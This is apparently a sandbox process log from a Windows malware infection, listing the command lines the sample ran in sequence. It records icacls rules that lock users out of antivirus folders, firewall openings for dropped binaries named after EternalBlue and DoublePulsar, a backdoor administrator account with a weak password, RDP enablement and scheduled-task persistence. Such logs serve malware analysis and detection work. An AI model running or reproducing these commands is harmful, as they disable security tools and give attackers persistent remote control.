C:\ProgramData\Windows\rfusclient.exe /tray
C:\Windows\SysWOW64\sc.exe
sc delete clr_optimization_v4.0.30318_64"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
C:\Windows\SysWOW64\sc.exe
sc stop MicrosoftMysql
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
C:\Windows\SysWOW64\sc.exe
sc delete MicrosoftMysql
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
C:\Users\Admin\Downloads\Mabezat.exe
"C:\Users\Admin\Downloads\Mabezat.exe"
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
C:\Users\Admin\Downloads\Mabezat.exe
"C:\Users\Admin\Downloads\Mabezat.exe"
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny Admin:(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny System:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny Admin:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny System:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
C:\programdata\microsoft\intel\R8.exe
C:\programdata\microsoft\intel\R8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
C:\ProgramData\Microsoft\Intel\winlog.exe
C:\ProgramData\Microsoft\Intel\winlog.exe -p123
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
C:\ProgramData\Microsoft\Intel\winlogon.exe
"C:\ProgramData\Microsoft\Intel\winlogon.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5FC5.tmp\5FC6.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6308,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4568 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\rdp\Rar.exe
"Rar.exe" e -p555 db.rar
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\ProgramData\RealtekHD\taskhostw.exe
C:\ProgramData\RealtekHD\taskhostw.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net.exe user "john" "12345" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "john" "12345" /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administratorzy" "John" /add
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Administradores" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Usuarios de escritorio remoto" John /add
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Uzytkownicy pulpitu zdalnego" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -i -o
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Programdata\WindowsTask\winlogon.exe
C:\Programdata\WindowsTask\winlogon.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C schtasks /query /fo list
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\schtasks.exe
schtasks /query /fo list
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
